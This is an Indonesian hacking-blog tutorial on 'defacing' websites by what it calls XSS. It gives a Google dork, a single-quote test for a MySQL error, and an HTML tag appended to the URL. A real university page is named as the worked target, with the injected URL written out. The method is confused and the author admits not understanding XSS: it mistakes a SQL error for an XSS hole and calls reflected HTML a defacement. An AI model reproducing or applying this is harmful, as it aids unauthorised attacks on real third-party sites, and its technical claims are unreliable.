Cara Deface Methode Xss

Cara Deface Methode Xss - Hello gays kembali lagi bersama saya Imamkun di blog explosion squad cyber di artikel kali ini saya akan mengajarkan kalian bagaimana caranya deface dengan methode xss sebelum kita ke tutorialnya marih kita simak dlu apa itu xss

Xss Merupakan methode dimana client memasukan script html ke sebuh website kepanjangan dari xss - Croos Site Scripting Attack

Oke saya juga sebenernya kurang tahu hehe tapi gagapalah biar blog ini artikelnya rame hehe oke langsung saja kita ke tutorialnya

Dork : inurl:news.php?id=

Pertama tama silahkan kita dorking dork diatas ke goggle 

jika sudah nanti akan banyak website yang keluar dari muka bumi ini ehh maksudnya goggle 

pilihlah salah satu website yang menurut kalian vuln sebagai contoh saya memakai link dibawah ini
https://www.yarsi.ac.id/alumni/news.php?id=11
Sekarang kita coba masukan ( ' ) tanpa tanda kurung

jika vuln akan ada tulisan seperti dibawah ini
 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 3
Nah selanjutnya kita tambahkan saja seperti dibawah ini
 <h1>ImamKun</h1>
Jadinya akan seperti ini site.com/<h1>ImamKun</h1>
jika lebih jelasnya
 https://www.yarsi.ac.id/alumni/news.php?id=11'<h1>ImamKun</h1>
Nah gimana mudah bukan pastinya lah deface poc ini sangatlah mudah anak bayi juga bisa okowkow
cukup sekian artikel saya kali ini mengenai "  Cara Deface Methode Xss "

Belum ada Komentar untuk "Cara Deface Methode Xss"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel